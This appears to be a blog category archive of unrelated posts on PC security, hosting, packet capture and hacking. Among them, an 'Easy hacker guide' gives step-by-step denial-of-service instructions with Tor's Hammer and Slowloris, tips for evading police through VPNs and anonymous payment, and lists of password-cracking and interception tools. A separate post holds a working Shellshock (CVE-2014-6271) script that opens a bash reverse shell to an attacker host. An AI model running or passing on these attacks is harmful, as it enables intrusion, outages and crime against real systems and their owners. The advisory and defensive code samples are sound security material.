Category Archives: Server

How To Protect Your PC From Hackers?

Computer viruses are spreading rapidly across the World Wide Web as numerous hackers unleash them on the internet in the hope of stealing private financial information. To protect yourself completely, it is important to have a set of hardware and software tools on your network and PC so that you can safeguard it from any possible virus, malware, worm, or trojan threat.

Although hackers are hunting for unprotected networks and systems, the best antivirus software programs provide complete protection so that you don’t become one of the vulnerable… still, there is a lot more that can be done.

To prevent your data from being compromised, it is important to minimize the damaging effects by taking some compulsory measures to safeguard your system from online viruses. A few tips to protect your system from viruses and spyware are mentioned below:

Use a Dynamic Firewall Protection: Download antivirus software in conjunction with an effective firewall that can successfully prevent hackers from breaking into your PC. A firewall filters information passed through the internet to your network and prevents hackers from attacking your computer.

The best bet is to use a firewall embedded in a router. The best ones run open-source, Linux-based firmware: constantly updated and highly configurable.

Software firewalls are OK, but you’ll need a copy on every PC, tablet and phone connected to your network.

Use WPA/WPA2 Encryption: It is essential to use WPA or WPA2 encryption to prevent hackers from attacking your PC over a wireless network. Encrypted wireless transmissions are not impossible to break, although it takes a considerable amount of time and effort for hackers to get information. The weaker your wireless network, the less time it would take for a hacker to access your PC.

That means a strong password.

Additionally, set up your wireless router with a guest network, so your visitors do not connect to your main network with their, surely, less protected devices.

Open Attachments from Trusted Sources: Attachments that are from trusted and known sources can be opened, and everything else must be deleted immediately. Even though there are many types of file attachments that you may be curious about, it is best that you don’t compromise your PC safety by opening them if they are not from a trusted source.

This is a human thing. Use an email service with strong antivirus detection; do not skimp on that.

Still, make sure you never click on a weird attachment.

Install a sandbox system on your PC to test and check these attachments.

Maybe a Linux virtual machine!

Active Antivirus Program: Choosing an effective computer virus protection is essential as it gives guaranteed protection against malicious code and other harmful online virus threats. If you accidentally download a virus-infected file, your antivirus download will provide protection and quarantine the file.

Which antivirus is the best? Difficult to say: they are all good and bad, and even Windows Defender works fine.

It is all about prevention.

Following the above mentioned essential steps will help you to safeguard your PC and keep your private and confidential information safe. Stay vigilant and choose a dynamic antivirus program to safeguard your system.

Again, use an encrypted DNS server like Cloudflare 1.1.1.1; check before you use them and check if the traffic is spied on by them.

Use a VPN service for untrusted sites or sites that need extra security (Northvpn served me well to the current day).

Keep your router password strong and keep your router updated.

In following articles I’ll show some brands able to help you out.😎

However, the weakest link in the chain is you, with your curiosity and weakness for clicking on anything!😃

One second of clicking, days of pain!😭

Good luck

Easy hacker guide

First and foremost, it is important for you to understand that ‘hacking’ is a broad term. There are many aspects
to it, most of which require several programming skills, but that shouldn’t stop you from using the tools made
available by the internet for you to take advantage of.
Go to the HTMLdog website and learn some HTML first, it is a great website and you will progress in no time. Also,
consider Python as your first programming language; it is a tradition to recommend Python to newbies because it is
the fundamental and appropriate language that will kickstart you in the world of computing. So, now that you are
set and ready to continue with the quest, allow me to present to you a simplistic and minimalistic reference guide.
On a side note, before you start, make sure your internet connection has some sort of protection, either through a
proxy or a VPN. DO NOT TAKE ANY RECOMMENDATIONS FROM OTHER ANONYMOUS MEMBERS, EVEN OPS.
They could be trying to hook you up with a VPN service that is cooperating with the feds.
Do your own research on your VPN, Privacy policy, Terms of Agreement etc. NOBODY IS GOING TO JAIL FOR YOU.
After that, pay with anonymous payment methods, again, do your own research on those methods too.
[PS: Do NOT perform DDoS attacks while on VPN. They may protect your data from the destination, but don’t go as far
as trusting them when you’re sending endless packets over their servers. Needless to say, your safety is not of any
concern to me so take care of yourself first.]
———-
OS Picking
———-
For hacking specifically, it is recommended to use open source Operating Systems (OSes) such as Linux distributions
that have root (Administrator) privileges in order to get the most out of the tools you use. Let me give you some
ordered examples:
FOR LINUX NOOBS
1) Mint — great to learn Linux and for hacking as well, tools can be added easily, and has a lovely desktop.
2) Ubuntu — same as mint, but better approach toward learning Linux than just looking good. Mint is based on it.
3) Tails — strongly recommended as a Virtual Machine, it is closest to anonymity you can get.
Despite what other anons and the internet are saying, Kali isn’t useful to you unless you have your own server to work on.
The OS is broken and insecure, and is built for security pentesters.
Kali will provide very poor security unless you know what you’re doing.
————–
Wireless Cards
————–
In case you do as I suggested above, and get yourself a Virtual Machine (VM) with either of the three recommended
distributions, you will need a USB Wireless Network Adapter in order to be able to execute wireless attacks from it.
This is needed because a Virtual Machine cannot share a single wireless card with the host machine. For the sake of
convenience, price, accuracy, packet injection and sniffing capabilities, I strongly recommend a very widely used
card called the Alfa AWUS036NHA with the AR9271 chipset, which can be found by following the link directly below:
http://www.simplewifi.com/alfa80211bgnhighpoweradapter150mbpsatherosar9271chipset.html
———
Anonymity
———
There is a constant presence of fear in everyone’s mind that our information is being monitored 24/7/365 by people
behind monitors all day long, searching for private data and invading your personal life. Well, this conspiracy is
something experienced by those who have something to hide from the authorities, whether it is illegal or possibly
embarrassing.
Either way, there is one thing you must know — you will never be able to fully protect yourself while
browsing on the internet. However, there are several tools and techniques you may embed in order to get as close as
possible to being anonymous online. True anonymity lies in several layers of data transfer, which is difficult for
an individual to achieve without knowledge of third-party software that allows such possibilities.
Remember, there’s no magical tool that lets you be 100% anonymous online.
You will NEVER be 100% anonymous in a system that is designed to be traceable.
Let’s get straight to the point. The following techniques will help to achieve a high anonymity level:
• TOR — found at https://www.torproject.org/ it allows you to connect through several nodes before reaching a server,
       and that way all data transfer stays private. For maximum browsing anonymity,
        use the TOR browser in combination with a good, paid VPN as well.
• VPN — stands for Virtual Private Network and is a server that you connect through before you reach anything online.
       From a security point of view, it is the safest and most anonymous tool to use, as long as you trust the VPN
       provider.
• Proxy — This is another possible way to achieve good anonymity, but is often slow and unreliable for torrenting or
         downloading large files. Proxy websites can be found anywhere online, but preferably use proxy servers that
         need configuration of the browser settings, since that will likely cause fewer javascript and HTML issues.
• More Useful Tools/Guides
       1) Anonymous file sharing: https://onionshare.org
       2) File uploading: http://tinyupload.com/  and  https://anonfiles.com/
       3) http://www.deepdotweb.com/jollyrogerssecurityguideforbeginners/
—————-
DoS & DDoS Tools (don’t use them unless instructed)
—————-
HOWEVER: if anybody tells you to use tools such as LOIC, XOIC, HOIC or any other similar tools, do not listen to them
        since they obviously are not aware of the incredibly high risks of getting caught when using them. Tools that
        end in OIC are easily traced to your IP address and expect to get in trouble if you use them. Besides, using
        them on your own will cause no damage to public IPs due to the severe limitations. So, end point, forget it!
======================================================================================================================
TOR’s Hammer (works on systems that have Python installed.)
• Note: this tool allows the use of the TOR browser to prevent getting caught. I recommend and, in some ways, insist
 that you do so, because nobody other than you is liable for the damage you will cause from using this tool.
How to Set Up:
0) Download it first, duh! http://sourceforge.net/projects/torshammer
1) Download python. Note: Mac users have it preinstalled
2) Place the torshammer folder (unpackaged) on your Desktop
3) In the torshammer folder there will be a file called ‘torshammer.py’ that you will need to open with a text editor
4) Inside the file, use the Find & Replace function to replace the three occurrences of ‘9050’ with ‘9150’ and save
5) Open CMD or Terminal and type (without quotes) “cd Desktop” and then “cd torshammer”
6) Now open the TOR browser and wait for your new identity. To ensure it works, visit at least 2 >DIFFERENT< websites
7) In your CMD / Terminal type (without quotes) “./torshammer.py t example.com r 300 T”
  To understand the syntax of the command, ‘cd’ to the torshammer folder and type (without quotes) “./torshammer.py”
Slowloris
One of my favorite tools that I used when I started DoSing.
IPV4 version: http://ha.ckers.org/slowloris/slowloris.pl
IPV6 version: http://ha.ckers.org/slowloris/slowloris6.pl
To download, simply copy the text to a file and save it as slowloris.pl and/or slowloris6.pl respectively.
You will need perl in order to run Slowloris, tutorials of which can be found online.
Ufonet
>>> https://github.com/epsylon/ufonet
I will not explain here how to set this up, since you have Google at your disposal.
MDK3
This is preinstalled on Kali Linux and it basically allows to deauthenticate any WiFi routers in range by overloading
them with empty packets until they can no longer operate, thus taking them down locally on your own (DoS).
======================================================================================================================
———————–
Password Cracking Tools
———————–
Ophcrack
Read info      >>> http://blog.codinghorror.com/rainbowhashcracking
Download       >>> http://ophcrack.sourceforge.net
L0phtCrack
It is an alternative to Ophcrack and is used to crack Windows passwords from hashes.
http://www.l0phtcrack.com/download.html
John the Ripper
>>> http://www.openwall.com/john
Reaver
This is specifically a WPA(&2) WiFi cracking tool, supporting routers with WPS (Wireless Protected Setup) enabled
It is preinstalled on Kali Linux, and hopefully on the other hacking Linux distributions too. It does NOT work
on Windows, in fact Windows is the least reliable OS for hacking, so I regard it as a skiddie OS.
Aircrack-ng
Cracks WEP & WPA; it analyzes wireless encrypted packets and then tries to crack passwords via its cracking algorithm.
http://www.aircrackng.org/install.html
Hydra
This uses brute force and dictionary attacks to crack any password that is on a specific wordlist. It is well built
and is very configurable, giving you a wide range of options to pick from, and limits to set. Here’s a great tutorial:
http://nullbyte.wonderhowto.com/howto/hacklikeprocrackonlinepasswordswithtamperdatathchydra0155374
Hashcat
Uses your GPU to crack hashes, very strong.
http://hashcat.net/hashcat/
——————————–
Man In The Middle (MITM) Attacks
——————————–
Note: enable routing first, by typing in terminal (without quotes) “echo 1 > /proc/sys/net/ipv4/ip_forward”
================================
Wireshark
Extremely configurable and versatile, and has close to no limitations as to functionality.
Kali Linux has it preinstalled. For Windows and Mac, download it here: https://www.wireshark.org/download.html
Ettercap
As usual, it is preinstalled on Kali Linux. It performs marvellously, and supports ‘driftnet’ (for image capturing).
>>> http://ettercap.github.io/ettercap/downloads.html
—————-
Website Scanning
—————-
nmap
This is great for port scanning, checking whether a host is up, ping scan, TCP and UDP, etc.
>>> http://nmap.org/download.html
Nikto
It performs comprehensive tests against web servers for items including potentially dangerous files, performs checks
for outdated server versions, and version specific problems.
>>> https://github.com/sullo/nikto
Dmitry
About it  >>>  http://linux.die.net/man/1/dmitry
Download  >>>  http://packetstormsecurity.com/files/download/35796/DMitry1.2a.tar.gz
Vega
A powerful vulnerability scanner.
>>> https://subgraph.com/vega/download
CL2 (filename)
This is a simple web crawler written in Python that indexes all hyperlinks of a particular webpage and/or website.
>>> https://ghostbin.com/paste/vg3af
FTPSpider
Written in perl, it cleverly scans FTP servers and logs their directory structure, detects anonymous access & writable
directories, and looks for user specified data.
http://packetstormsecurity.com/files/35120/ftpspider.pl.html
Arachni
This is a framework developed to assess web app security and evaluate them in real time.
Read about it & download it here >>> http://www.arachniscanner.com/
————–
Useful To Note
————–
Detailed information about IP addresses — http://www.iptracker.org
A course I highly recommend you follow — http://offensivesecurity.com/metasploitunleashed/Main_Page
Find out what websites are built with — http://builtwith.com
======================================================================================================================
======================================================================================================================
———-
ALL IN ALL
———-
Conclusion: You are prepared for anything if you are able to apprehend the work that lies ahead, but let me tell you,
           no one is going to endlessly spoonfeed you the information and knowledge, because all you will learn is
           how to copy from someone else. I think the old saying “practice makes perfect” fits this pretty damn well
           from my point of view, and I’m not saying that you can’t ask anything, but if you want to learn fast, do
           it the hard way and look it up yourself, that’s all!
For the record
All tools used above are compatible with Linux distributions (apart from L0phtCrack) and are best used with the three
OSes that I listed at the very beginning. In my personal opinion, and I’m sure many people would agree with me here,
Windows is not suited best for the tools listed above. However, it would be useful for you to get hold of a Virtual
Machine program in that case, such as VirtualBox (( https://www.virtualbox.org/wiki/Downloads )), and a disk image
of a Linux distribution.
If you read the whole lot, that should get you started, and remember to have fun! Good luck 😀

South Korean Malware Attack

 

Executive Summary

Reporting and technical details surrounding the malware used in the March 20, 2013, attack on South Korean assets have been varied and inconsistent. However, there are some commonalities reported across multiple organizations that provide some level of insight into the malware, dubbed DarkSeoul.

The common attributes of the attack campaign are the following:

• The malicious file wipes the master boot record (MBR) and other files.
• The malware was hard coded with a specific execution date and time and searches machines for credentials with administrative/root access to servers.
• The malware is written to specifically target South Korean victims.
• The attack is effective on multiple operating systems.
• The design is low sophistication – high damage.

When assessing the potential risk to U.S. Critical Infrastructure and Key Resources (CIKR), it is important to understand that DarkSeoul appears to have been coded for a specific target in this case and designed to evade typical South Korean antivirus processes. As this malware is currently packaged, it is a low risk to U.S. CIKR; however, the concepts underpinning this attack would likely succeed in many common enterprise environments. For this reason, U.S. CIKR owners and operators should continue the best standard security practices to avoid infection and propagation of a wiper or other type of malware that may impact their systems.

Defensive Measures

Based on the common attributes detailed above, US‐CERT reminds users and administrators of the importance of best practices to strengthen the security posture of their organization’s systems. CIKR owners and operators should work toward a resilient network model that assumes such an attack will occur against their enterprise. The goal is to minimize damage, and provide pathways for restoration of critical business functions in the shortest amount of time possible.

• Encourage users to transfer critical files to network shares, to allow for centralized backups. Leverage technical solutions to automate centralized storage where possible to reduce reliance on end-user voluntary compliance.
• Execute daily backups of all critical systems, including offline and offsite copies of backup media.
• Periodically execute a practice data restoration from backups, including key databases to ensure integrity of existing backups and processes.
• Establish emergency communications plans should network resources become unavailable.
• Isolate any critical networks (including operations networks) from business systems, and where possible segment the business networks.
• Identify critical systems and evaluate the need to have on-hand spares to quickly restore service.
• Recognize that without proper internal monitoring, an organization’s “Enterprise Trust Anchors” (Active Directory, PKI, two-factor authentication, etc.) and centralized management services (remote helpdesk access, patch management and asset inventory suites, etc.) could be compromised and used to subvert all other security controls.
• Maintain up‐to‐date antivirus signatures and engines.
• Restrict users’ ability (permissions) to install and run unwanted software applications through Microsoft Software Restriction Policy (application directory whitelisting) or AppLocker, application whitelisting products, or host-based intrusion prevention software.
• Enforce a strong password policy and implement regular password changes.
• Keep operating system patches up to date.
• Disable unnecessary services on workstations and servers.
• Scan for and remove suspicious email attachments; ensure the scanned attachment is its ‘true file type’ (i.e., the extension matches the file header).
• Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs).
• Scan all software downloaded from the Internet prior to executing by properly authorized personnel.
• Disable credential caching for all desktop devices with particular importance on critical systems such as servers and restrict the number of cached credentials for all portable devices to no more than three, if possible. This can be accomplished through a Group Policy Object (GPO).
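The ‘true file type’ check from the list above (the extension matches the file header) can be sketched as follows. This is an added example, not part of the US-CERT text; the signature table is a small constructed subset and the verdict names are illustrative assumptions.

```python
import os

# Well-known leading "magic" bytes for a few common attachment types.
# Constructed subset for illustration; a mail gateway would use a fuller table.
SIGNATURES = {
    "pdf": [b"%PDF-"],
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
    "zip": [b"PK\x03\x04", b"PK\x05\x06"],          # also .docx/.xlsx/.pptx containers
    "ole2": [b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"],  # legacy .doc/.xls/.ppt
    "pe": [b"MZ"],                                   # Windows executables
}

# File extension -> the header family that extension promises.
EXTENSION_FAMILY = {
    ".pdf": "pdf", ".png": "png", ".jpg": "jpeg", ".jpeg": "jpeg", ".gif": "gif",
    ".zip": "zip", ".docx": "zip", ".xlsx": "zip", ".pptx": "zip",
    ".doc": "ole2", ".xls": "ole2", ".ppt": "ole2",
    ".exe": "pe", ".dll": "pe", ".scr": "pe",
}


def sniff(data):
    """Return the header family of the content, or None if it is not recognised."""
    for family, prefixes in SIGNATURES.items():
        if any(data.startswith(prefix) for prefix in prefixes):
            return family
    return None


def check_attachment(filename, data):
    """Compare what the file name claims with what the first bytes say."""
    name = os.path.basename(filename).lower()
    stem, ext = os.path.splitext(name)
    claimed = EXTENSION_FAMILY.get(ext)
    actual = sniff(data)

    # "invoice.pdf.exe": a document-looking name that ends in an executable extension.
    inner_ext = os.path.splitext(stem)[1]
    if claimed == "pe" and EXTENSION_FAMILY.get(inner_ext, "pe") != "pe":
        return "double-extension"
    # Executable content behind any non-executable name is the worst mismatch.
    if actual == "pe" and claimed != "pe":
        return "disguised-executable"
    if claimed is None:
        return "unknown-extension"
    return "match" if actual == claimed else "mismatch"


# Constructed sample attachments: (file name, first bytes of the content).
SAMPLES = [
    ("report.pdf", b"%PDF-1.7\n%\xe2\xe3\xcf\xd3"),
    ("photo.jpg", b"MZ\x90\x00\x03\x00\x00\x00"),
    ("notes.docx", b"PK\x03\x04\x14\x00\x06\x00"),
    ("scan.png", b"%PDF-1.4\n"),
    ("invoice.pdf.exe", b"MZ\x90\x00"),
    ("data.bin", b"\x00\x01\x02\x03"),
]

if __name__ == "__main__":
    for sample_name, sample_bytes in SAMPLES:
        print(f"{sample_name:18} {check_attachment(sample_name, sample_bytes)}")
```
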

Choosing a Hosting Environment – Linux vs Windows

Choosing a hosting environment is one of the first decisions when selecting a Web hosting package. Although you may already have a preference, consider these key differences when creating a new Web project for yourself or a client.

When embarking on a new Web project, one of the first decisions to make is regarding the Web hosting platform. Both Linux and Windows platforms are proven to be reliable and able to support a range of Web projects, so it is not a question of one being superior to the other. While you may have an allegiance to either Linux or Windows based on your choice of operating system or what you’ve been advised, it is essential to choose the technology that is more suited to your style of Web building and fitted to your project’s requirements.

Consider the tools and scripting language you plan to use – if you use PHP, MySQL, Python, Ruby or Perl together with a variety of software programs, Linux is the one for you. If the applications you plan to use are Windows-specific, then Windows hosting is likely to be the right choice. Most Web hosts offer packages that include an array of additional features to maximize both platforms. Either way, there are a variety of ways to bring your Web project to life.

Linux Hosting Overview

When it comes to Web hosting, Linux is widely considered to be the best operating system for Web servers. Characteristically reliable, stable and efficient, Linux supports even the most demanding environments for Web and mail servers.

Linux Web Hosting Packages support the most popular and important scripting languages, including PHP 5.5 and 5.6. Frameworks like Zend make it easier for you to display dynamic content, quickly access databases, and adapt the functionality of the Web project to your requirements. With 1&1’s git versioning tool, you have the option to save various work items on your Web space.

Linux is also ideal for the kind of websites that display information as a brochure, in newsletter format or as data sheets. Linux works well for ‘brochure-ware’ sites that offer interaction via inquiry forms, online purchasing and other eCommerce functions.

When looking for ready-to-use solutions to power your website, applications such as blogs, content management systems (CMS) or discussion boards, more open-source applications can be found for Linux hosting.

Windows® Hosting Overview

Windows facilitates varying degrees of design and management through a drag-and-drop philosophy, via .NET Framework and SharePoint. By this, Windows presents an advantage when it comes to the integration of Windows applications when you’re designing your website. Essential Windows-specific applications such as ASP® will work comfortably with this particular type of hosting package.  Windows Web Hosting Packages support all .NET Framework versions up to 4.5 and ASP.NET, PHP and Perl. A separate application pool with up to ten .NET applications is also included.

Software for Windows® hosting is more likely to be based on licensed sources that are available to purchase at an additional fee. Yet Windows presents an advantage if you plan to incorporate searchable databases within your website. The reduced development time and better integrated functionality characteristics of Windows® Hosting offer a real advantage for users wishing to incorporate database facilities to their website.

Apps and Services

If all you want to do is create a plain, vanilla website using simple design tools, then either Linux or Windows will do the job. However, if you are looking to build something specific such as a blog or eCommerce site, but do not necessarily want to code something from scratch, then you will want a platform that provides easy access to pre-built sites – and that means Linux hosting is the way to go.

Linux platforms support the most popular open-source applications and content management systems. This includes popular CMS like WordPress, Joomla!, Drupal, Typo3, and Magento. Many Web hosting providers provide tools to simplify the process of setting up Web projects using these popular applications.

With Windows-based hosting, you can add all of this functionality separately, but you may have to pay for the privilege – however, tools like Visual Studio offer free versions to help you get started.

Language and Scripting

Both Linux and Windows packages support key languages such as PHP and Perl, although there is a subtle difference in support. For example, at 1&1, Windows packages currently support PHP 5.3.5, while Linux supports PHP 5.5 and now PHP 5.6 Beta.

Linux packages exclusively support the Zend Framework for PHP 5, plus Ruby and Python languages, while Windows packages add support for Windows-based technologies such as ASP.NET and .NET Framework 4/4.5 as well as ASP MVC 3 and 4 and MS SQL 2012 databases.

Cost

As Linux is an open-source system, most of the tools and scripting languages used on a Linux-based Web platform are also free and open-source. This obviously results in a lower cost overall. They may lack some of the finesse of Windows-based tools, but you can set up anything without having to pay any licensing costs. Software for Windows-based hosting usually comes with a cost attached, although some free solutions can be found.

Linux and Windows differ in price at many Web hosting companies, often with Windows being more expensive due to the additional licensing fees required.

Getting the Local Traffic Report

It can be problematic and lead to headaches – and possibly even hair loss (your follicles may vary) – if you need to capture local network traffic (sent to your own device or PC), as many tools (even the venerable Wireshark) aren’t very helpful with that scenario. However, there is a way to do it using two free tools, namely RawCap and the aforementioned Wireshark. Once you know how, it’s (almost) as easy as pie (that is, eating a pie, such as an apple pie – not memorizing 3.14…, etc.).

First, download RawCap here

Next (provided you don’t already have it, of course), download Wireshark here

Once you have RawCap and Wireshark installed, open a command prompt and navigate to the folder where you downloaded RawCap.

Then, enter a command such as “rawcap.exe 127.0.0.1 platypus.pcap”

which is:

RawCap.exe [IP Address you want to monitor] [name of file].pcap

You can run RawCap one of two ways:

Run cmd as Administrator Proactively

Select Start > All Programs > Accessories > Command Prompt > right-click > Run as Administrator

Run cmd as “Normal” User and Respond to Prompt

Select Start > “cmd” > [ enter command line for rawcap to use ] > accept “User Account Control” dialog

If you use the latter option, the feedback (how many packets have been received) will display in a separate command prompt window:

IOW, the difference between the two ways of running it is: Do you want to get and dismiss the “User Account Control” dialog before you enter the command line verbiage or after you enter it?

Go

Now, perform the procedure that generates the network traffic you want to capture. Once it is finished, you can go back to the command prompt and mash Ctrl+C. Alternatively, you can specify the count of packets you want it to capture, or the number of seconds for which you want it to capture. Enter “rawcap ?” and mash the Enter key for the syntax for doing either of these. Or, you can take my word for it that it is:

“-c [packet count]” to “stop sniffing after receiving a specified count of packets”

-and

“-s [number of seconds]” to “stop sniffing after a specified number of seconds”

IOW:

rawcap.exe -c 42 127.0.0.1 meaningOfLifeEtc.pcap

…to capture 42 packets

-and:

rawcap.exe -s 8 127.0.0.1 rodeo.pcap

…to capture packets until the cowboy either gets bucked off or outlasts the beast.

After mashing the Enter key to start rawcap capturing, then performing the operation to send/receive packets, and finally mashing Ctrl+C at the command prompt to stop capturing, you will see something like this (where the folder to which you downloaded rawcap replaces “MiscInWindows7”) there at the command line:

After the capture is complete using any of the methodologies delineated above (manually stopping capturing, or setting it to capture a number of packets or for a specified number of seconds), open Wireshark and select File > Open…, navigate to the .pcap file, and open it.

You will then cast your beaming and/or gleaming peepers upon a magnificent cornucopia of information about the network traffic captured. You can now search through this overgrown forest for individual trees you want to find by selecting Edit > Find Packet… and then entering what is of interest to you; in my case, I’m expecting some traffic to/from port 7727 on my PC, so I enter that:

…and it takes me to the first line with such; Selecting Find > Next (Ctrl+N) takes me to the next one (etc.)

And so you have it: a couple of free tools and a modicum of work, and you’ve got more network traffic information than your local television stations’ traffic reporter ever dreamed of having.
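The port search described above can also be done on the .pcap file directly. The following is an added example, not part of the original post: it reads a classic pcap file and lists the frames whose TCP or UDP source or destination port is 7727. It assumes the capture uses a raw-IP link type (packets start at the IP header, as expected for a raw-socket loopback capture) and also accepts Ethernet; the function names and the embedded sample capture are constructed for illustration.

```python
import socket
import struct

ETHERNET = 1
RAW_IP_LINKTYPES = {101, 12}  # LINKTYPE_RAW and the older DLT_RAW value (assumed for RawCap files)


def read_pcap(data):
    """Yield (frame_number, linktype, packet_bytes) from a classic .pcap byte string."""
    magic = data[:4]
    if magic in (b"\xd4\xc3\xb2\xa1", b"\x4d\x3c\xb2\xa1"):    # little-endian, usec / nsec
        endian = "<"
    elif magic in (b"\xa1\xb2\xc3\xd4", b"\xa1\xb2\x3c\x4d"):  # big-endian, usec / nsec
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    offset, frame = 24, 0
    while offset + 16 <= len(data):
        _sec, _frac, incl_len, _orig_len = struct.unpack(endian + "IIII", data[offset:offset + 16])
        offset += 16
        if offset + incl_len > len(data):
            break  # last record cut short, e.g. the capture was interrupted mid-write
        frame += 1
        yield frame, linktype, data[offset:offset + incl_len]
        offset += incl_len


def flows_on_port(data, port):
    """Return (frame, proto, src_ip, src_port, dst_ip, dst_port) for IPv4 TCP/UDP frames using port."""
    hits = []
    for frame, linktype, pkt in read_pcap(data):
        if linktype == ETHERNET:
            if pkt[12:14] != b"\x08\x00":      # EtherType is not IPv4
                continue
            pkt = pkt[14:]
        elif linktype not in RAW_IP_LINKTYPES:
            raise ValueError("unsupported link type %d" % linktype)
        if len(pkt) < 20 or pkt[0] >> 4 != 4:  # IPv4 only in this sketch
            continue
        if struct.unpack("!H", pkt[6:8])[0] & 0x1FFF:
            continue                           # later fragment: carries no TCP/UDP header
        ihl = (pkt[0] & 0x0F) * 4
        proto = {6: "TCP", 17: "UDP"}.get(pkt[9])
        if proto is None or len(pkt) < ihl + 4:
            continue
        sport, dport = struct.unpack("!HH", pkt[ihl:ihl + 4])
        if port in (sport, dport):
            hits.append((frame, proto, socket.inet_ntoa(pkt[12:16]), sport,
                         socket.inet_ntoa(pkt[16:20]), dport))
    return hits


def build_sample_capture():
    """Constructed three-packet loopback capture (raw IP, checksums left at zero)."""
    lo = socket.inet_aton("127.0.0.1")

    def ipv4(proto, payload):
        header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0, lo, lo)
        return header + payload

    def tcp(sport, dport):
        return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 8192, 0, 0)

    def udp(sport, dport):
        return struct.pack("!HHHH", sport, dport, 8, 0)

    packets = [ipv4(6, tcp(50123, 7727)), ipv4(17, udp(5353, 5353)), ipv4(6, tcp(7727, 50123))]
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 101)
    for i, pkt in enumerate(packets):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(pkt), len(pkt)) + pkt
    return out


if __name__ == "__main__":
    # For a real capture: flows_on_port(open("platypus.pcap", "rb").read(), 7727)
    for hit in flows_on_port(build_sample_capture(), 7727):
        print("frame %d %s %s:%d -> %s:%d" % hit)
```
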

Check vulnerable reverse shell CGI (shellshock)

#
#CVE-2014-6271 cgi-bin reverse shell
#
import httplib,urllib,sys
if (len(sys.argv)<4):
        print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
        print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
        exit(0)
conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
headers = {"Content-type": "application/x-www-form-urlencoded",
        "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data
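The script above places a Bash function definition in a request header named “test”. The defensive counterpart below is an added example, not part of the original post: it flags any header whose value begins like a function definition and rejects such requests in a WSGI middleware before a CGI handler can export them as environment variables. The names `shellshock_headers` and `ShellshockFilter` and the sample requests are constructed for illustration; the sample payload only echoes a marker string.

```python
import re

# CVE-2014-6271 triggers when an environment variable's value begins with "() {".
# Leading whitespace is tolerated because servers trim header values before export.
FUNC_DEF = re.compile(r"^\s*\(\s*\)\s*\{")


def parse_request(raw):
    """Split raw HTTP/1.x request bytes into (request_line, {lowercased header: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def shellshock_headers(headers):
    """Return the sorted names of headers whose value starts like a Bash function definition."""
    return sorted(name for name, value in headers.items() if FUNC_DEF.match(value))


class ShellshockFilter:
    """WSGI middleware: answer 400 when any string in the request environment
    (HTTP_* variables, QUERY_STRING, ...) starts like a function definition."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        bad = sorted(key for key, value in environ.items()
                     if isinstance(value, str) and FUNC_DEF.match(value))
        if bad:
            start_response("400 Bad Request", [("Content-Type", "text/plain")])
            return [("rejected: " + ", ".join(bad) + "\n").encode("ascii")]
        return self.app(environ, start_response)


# Constructed sample requests.
SUSPICIOUS_REQUEST = (
    b"GET /cgi-bin/test.cgi HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"Content-type: application/x-www-form-urlencoded\r\n"
    b"test: () { ignored;}; echo constructed-sample\r\n"
    b"\r\n"
)
BENIGN_REQUEST = (
    b"GET /cgi-bin/test.cgi HTTP/1.1\r\n"
    b"Host: localhost\r\n"
    b"User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for raw in (SUSPICIOUS_REQUEST, BENIGN_REQUEST):
        request_line, headers = parse_request(raw)
        print(request_line, "->", shellshock_headers(headers) or "clean")
```
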

Web server attack tools

Some of the common web server attack tools include:

  • Metasploit – this is an open source tool for developing, testing and using exploit code. It can be used to discover vulnerabilities in web servers and write exploits that can be used to compromise the server.
  • MPack – this is a web exploitation tool. It was written in PHP and is backed by MySQL as the database engine. Once a web server has been compromised using MPack, all traffic to it is redirected to malicious download websites.
  • Zeus – this tool can be used to turn a compromised computer into a bot or zombie. A bot is a compromised computer which is used to perform internet-based attacks. A botnet is a collection of compromised computers. The botnet can then be used in a denial of service attack or for sending spam mails.
  • Neosploit – this tool can be used to install programs, delete programs, replicate it, etc.

Use Virtualbox to Host Your Own Site, Mirror Your Tumblr or WordPress

 

Why not roll your own server at home, and then use it as a dashboard to manage and re-post to sites like Tumblr and WordPress? All you need is Virtualbox. Maymay shows us how it’s done.

Maymay’s setup is brilliant in its simplicity. Ultimately, there’s very little a web host is doing aside from running software that you can run on your own linux-based VM (virtual machine.) You can duplicate the setup rather easily with a VM running in VirtualBox.

Of course, doing this at home doesn’t scale, and it’s not always accessible to the broader internet (not to mention, your ISP won’t be happy if you have a popular site.) So Maymay points out that the goal of the project is to use your personal, self-hosted site as a HUD, a kind of dashboard, from where you can write and edit your posts, save them and back them up, and then use the included plug-ins to push your articles to Tumblr, WordPress, or another hosted service that you don’t control:

Blogging toolkit that provides a unified dashboard for creating and managing content on multiple Web hosting services simultaneously. Obviates the need for backing up your blog by creating content locally and then sending it to a Web server, rather than creating that content on a Web server and then backing it up to your computer.

This way you always have backups that you own and control, and you always have your original content somewhere, in case someone takes down something you’ve written, or something else happens. If you want total control, pair this up with a domain name that you own (and not something that ends in .tumblr.com or .wordpress.com) and you’re in business.

